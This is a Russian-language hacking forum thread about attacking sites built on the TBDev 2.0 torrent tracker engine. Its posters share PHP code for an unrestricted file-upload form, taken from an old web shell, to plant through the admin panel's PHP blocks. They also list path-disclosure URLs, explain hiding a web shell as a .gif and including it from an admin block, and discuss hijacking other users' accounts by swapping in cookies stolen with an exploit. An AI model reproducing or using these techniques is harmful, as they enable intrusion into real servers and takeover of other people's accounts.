Трекер-движок TBDev 2.0

Нет, при добавлении блока он ещё своё добавляет

 

Code:

$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "upload";}
switch($ac) {
case "upload":
echo <<<HTML
<table>
<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<input size="5" name="file" type="file"></td>
</tr>
<tr>
<td><input size="10" value="$docr/" name="path" type="text"><input type="submit" value="ОК"></td>
$tend
HTML;
if (isset($_POST['path'])){
$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}

if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
    echo "Файло  ".$_FILES['file']['name']."  загружен";
} else {
    print "Не удаётся загрузить файло. Инфа:\n";
    print_r($_FILES);
}
}
break;
}
?>
</pre>

Вот Замутил это из одного древнего шела Создаёте пихапе блок вписываете туда весь этот код Сохраняете. в нужном блоке И на указанных вами страницах будет отабражаться формачка залифки файла Найдёте эту формачку Укажите директорию, зальете.

 

Раскрытие путей:

Code:

recover.php?id[]=
email-gateway.php?id[]=
takeconfirm.php?id[]=
takeinvite.php?id[]=
topten.php?lim[]=
topten.php?type[]=

 

Обновление безопасности

 

Подскажите, пожалуйста, способ залить шелл, зайдя в админку. Способ через php-блок не катит, т.к. на папке выставлены права не позволяющие в неё писать (((
Если можно подробно.

 

aledain, должны стоять права 777.

Если они не стоят как ты сказал - тебе не повезло просто...

 

Не обязательно 777 иногда скрипт принудительно записывает блок хоть и ругается на отсутствие прав нл это как уже упоминалось выше- как повезет

 

?

у меня половина кода высвечиваеться в блоке, и там 2 формы в первой выбрать файл, после выбора наживаю ентер и кидает на http://site.ru/$self
пробвал во втором окне выбрать адрес в папку с оформление все так же кидает http://site.ru/$self
что не так я делаю?

 

Лучше залей гифный шелл и с инклудь его с админки

Смени расширение шелла с php на gif залей на серв

в админке создай php блок и сунь туда этот код

например так

include("torrents/images/44776.gif");

потом выставляешь отображение блока на какой нить странице и вуаля на той страничке откроется шелл

 

Это для старой версии сделано...
На новой я не тестил..
У нас в локале повальное распространение старого двига Серверов 100 наверно
и все на одном двиге=)

 

Ну так кто поможет? может кто зделать блок через который залить шел

 

Икстати ред вирус можно зделать как нибудь не фаловый блок ,а простым блоком с инклудить?

 

Подскажите как через куки зайти?

Взял я его куки со своей базы.


Открываю его сайт(куки)
Ид меняю на его и куки его ставлю! Обновляю страницу и я становлюсь как гость, вылетаю из под акка! Почему??

Обьяснить что не так

 

В поле uid в куках пишеш ид юзера...в поле pass пишеш куки которые ты через експлоит узнал...

 

я так и делаю! Но после того как обновляю страницу я делаюсь как гость

 

nAPEHb, не туда пассхэш пишеш.И вообще, для этих дел юзай оперу

 

Юзаю оперу!

В куках 3 строки:
pass
PHPSESSID
uid

Я меняю 1 и 3! И вылетаю

 

возможно подмену куки заделал разработчик, и новые фикс версии уже не подмениш куки((

 

что то мне кажется не так по експлой запускаешь и получаешь ответ.
Trying to get your cookies... [DONE]
Trying to get passhash:
Exploit failed

 

Сбрей усы, надень трусы.

Эксплоит уже мало где работает. Только там где ещё про багу не знают...